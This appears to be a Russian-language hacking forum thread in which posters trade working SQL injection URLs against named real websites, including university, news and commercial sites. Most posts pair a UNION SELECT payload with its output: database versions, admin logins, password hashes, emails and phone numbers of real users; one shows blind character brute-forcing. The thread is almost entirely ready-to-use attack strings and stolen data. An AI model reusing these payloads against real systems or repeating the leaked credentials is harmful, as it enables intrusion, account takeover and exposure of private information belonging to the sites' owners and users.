SQL Инъекции

pastebin.ru
Случайно найдена Chaak`ом и мной..

постим что-то типа кода (не указывая имя):

резалт:

 

Code:

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,password),version(),user(),8,9,10,11,12,13,14,15,1 
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*

Code:

http://www.autometaldirect.com/content.php?page=-118+union+select+1,2,concat_ws(0x3a,useremail,userpassword),4,null,6,7,8,9,10,11,12 
+from+user/*

 

=(( многоразовый боян.

юзай
http://filefront.jino-net.ru/sql.html

 

nexia.com

Code:

http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

4.1.20-community-ntnexiausr@localhostnexia

Code:

http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat(username,0x3,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+tmembers+limit+0,1/*

estudiogior5ar

 

Pogoda.ua. Погода в Украине и мире. Погода в Киеве. Прогноз погоды на 10 дней

test:test:[email protected]

 

globaleconomicgovernance.org

Code:

http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7/*

5.0.45-log[email protected]db158065722

Code:

http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,unhex(hex(concat_ws(0x3,userloginname,userpassword))),3,4,5,6,7+from+upload_users/*

test_user32570e9ad6d773db0af65ac057c5e4a7f

 

torg.ua

Code:

http://www.torg.ua/board_podrobno.php?details=2261+AND+1=1/*

Code:

http://www.torg.ua/board_podrobno.php?details=2261+AND+1=2/*

Смотрите разницу . Инъекция вывода не имеет, но можно посимвольно брутить, сбрутил версию:
-> Try 30 .. 70 -> Char > 50
-> Try 50 .. 70 -> Char < 60
-> Try 50 .. 61 -> Char < 55
-> Try 50 .. 56 -> Char < 53
-> Try 50 -> NO =(
-> Try 51 -> NO =(
-> Try 52 -> FOUND!
-> Ascii: 52
-> Char: 4

Ничего хорошего, четверка

 

tribeca.org

Code:

http://www.tribeca.org/content.php?id=-2'+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*

5.0.24a-standard-log[email protected]tribecaorgnew

Code:

http://www.tribeca.org/content.php?id=-2'+union+select+1,concat(admin,0x3,admin_pass),3,4,5,6,7,8+from+site_admin/*

adminadmin

mogadishni.com

Code:

http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5/*

4.1.20-community-ntchr@localhostmogadishni

Code:

http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,id,email,phone),2,3,4,5+from+contact+limit+2,1/*

4[email protected]+45 32543535

 

rfbd.ru - Телефонные Базы Данных г. Москва, Телефонные Справочники г. Москва, Паспортные Базы Данных г. Москва

5.0.37-standard-log:a1rfbd_guest@localhost:a1rfbd_ric_datebase

_cms_users


СоюзКредит.ру — быстрый денежный кредит, ипотека и автокредит

admin:llirik:kirill:[email protected]

 

На сладенькое немного .edu

Code:

http://www.ub.edu/crai/pharmakoteka/registre.php?id=-11+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

http://www.cpd.usu.edu/asset.php?id=-111+UNION+SELECT+1,table_name,table_name,table_name,5,6+from+information_schema.tables+limit+15,1/*

http://caxton.emich.edu/guide/guide.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8,9/*

http://math.ucsd.edu/people/profile.php?id=-111+UNION+SELECT+VERSION()/*

http://www.stots.edu/article.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*

 

http://www.whitleyaward.org/display.php?id=-75+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17 ,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33/
*

http://www.comicstriplibrary.org/display.php?id=-606+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,1 5,16,17,18,19/*

http://www.heroplay.com/features/articles/display.php?id=-27+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12,13,14 ,15,16,17 ,18,19,20,21/*

http://www.isdci.org/display.php?ID=-36+union+select+1,2 ,v ersi on(),4,5,6/*

http://www.noborder.org/actionday2005/display.php?id=-334+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12 ,13,14,1 5,16,17,18,19,20,21,2 2,23,24,25,26,27/*

 

5.0.22
admin:NZnlqRHG2GH8RHmHnShvb/
но так как такого хеша , по моему, нету поэтому вот вариации хешей всех админов при добавке $1$$ или $apr1$$ md5(Unix) или md5(APR) соответственно

$1$$M3TkIDtI14ob4MPCg42FO1
$1$$lw5UAzT2SsIuEfwZqZ45Z1
$1$$1xIcgmF403/oVi4lWT/mp/
$1$$MY4aW1u.6HE0oCMmBPGbS0
$1$$LhrLb2O5uxhivwYrDPGSj1
$1$$Eg92rdb3Ur7jmxG/Ip5na/
$1$$lEiUe5NQPjWHfblYeq8np/
$1$$eoqd8CPMgb77qCBgf4hA2/
$1$$NZnlqRHG2GH8RHmHnShvb/

$apr1$$M3TkIDtI14ob4MPCg42FO1
$apr1$$lw5UAzT2SsIuEfwZqZ45Z1
$apr1$$1xIcgmF403/oVi4lWT/mp/
$apr1$$MY4aW1u.6HE0oCMmBPGbS0
$apr1$$LhrLb2O5uxhivwYrDPGSj1
$apr1$$Eg92rdb3Ur7jmxG/Ip5na/
$apr1$$lEiUe5NQPjWHfblYeq8np/
$apr1$$eoqd8CPMgb77qCBgf4hA2/
$apr1$$NZnlqRHG2GH8RHmHnShvb/

 

http://www.hardvision.ru
Сама уязвимость:

Code:

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*

HTML:

login: foto
database: hardvision
version:5.0.45-5-log

Мой первый пост на форуме =)

 

Code:

http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,user,3,4,5,6,7,8+FROM%20mysql.user/*

Code:

http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,password,3,4,5,6,7,8+FROM%20mysql.user/*

Code:

http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,concat_ws(0x3A,table_schema,TABLE_NAME),3,4,5,6,7,8+FROM%20INFORMATION_SCHEMA.TABLES/*

А вот к форумной бд хз как подойти. Форум ломается обычным сплоитом и админы этого форума присутсвуют еще на 10 других, и везде админка форума защищена какойто дрянью... Мне кажется это "сеть" форумов
Если вдруг комуто очень надо будет, дам админский пасс, чтобы не ломились непонятные люди на форум и неписали какие они крутые кулхацкеры =/

 

Один очень симпатичный еврейский институт(никакой розьни )

www.shalom.edu.au
Домен в зоне .edu (образование)

Бажный линк:

HTML:

http://www.shalom.edu.au/contentPage.php?id=-139+union+select+1,2,version(),4/**/&parentId=1'

До конца доводить не решил(влом),но базовые данные выложу:

PHP:

база данных: shalom_shalom  (уже смешно :) )
юзер: shalom_limmudozD@localhost (шас описаюсь )))
версия: 4.1.22-standard-log

Между прочим у них очень красивые фотки и СОВСЕМ не фильтрующиея знаки..

 

хоть и твой первый пост .. но ты должен помнить ! что скулю надо раскручивать если есть такая возможность ! (5ая версия так что тут даже думать нечего !)

==============================================================

6к юзеров от булки - md5(md5($pass).$salt)

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+from+foto.admin_table/*
digit:30bf4fb4729f382ca2010fd445f1796d:mityap123

юзерские логины-пароли от сервиса www.getfoto.ru

hardvision:0b1f34d5c98ace48972bf71ccb6d5218:mityap13

 

Code:

http://toyota-opa.ru/articles.php?m=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*

5.0.45/opa/root@localhost

Code:

http://www.vitz.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*

5.0.45/vitz_2/root@localhost

Code:

http://www.raum.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*

5.0.45/vitz/root@localhost

 

mobilka.com.ua

mobilka.com.ua


_http://mobilka.com.ua/melodies/download.php?id=-3206+union+select+1,version(),3,4,5,6--

 

Hande hoch! Gitler kaput! Ich bin bose!

Code:

http://www.fulde-versicherungen.de/efnews/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+ef01pfuser/*

 

RANX.ru Знакомства по фотографиям! Без громоздких анкет!

Андрейas$w0rd:[email protected] - админ
Антон:ranx.ru:[email protected]
ГУЛЬНАРА:timeryn04:[email protected]

пароли были в Base64